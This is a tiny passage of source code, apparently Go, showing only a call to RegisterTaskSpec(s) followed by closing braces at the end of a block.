		RegisterTaskSpec(s)
	}
}
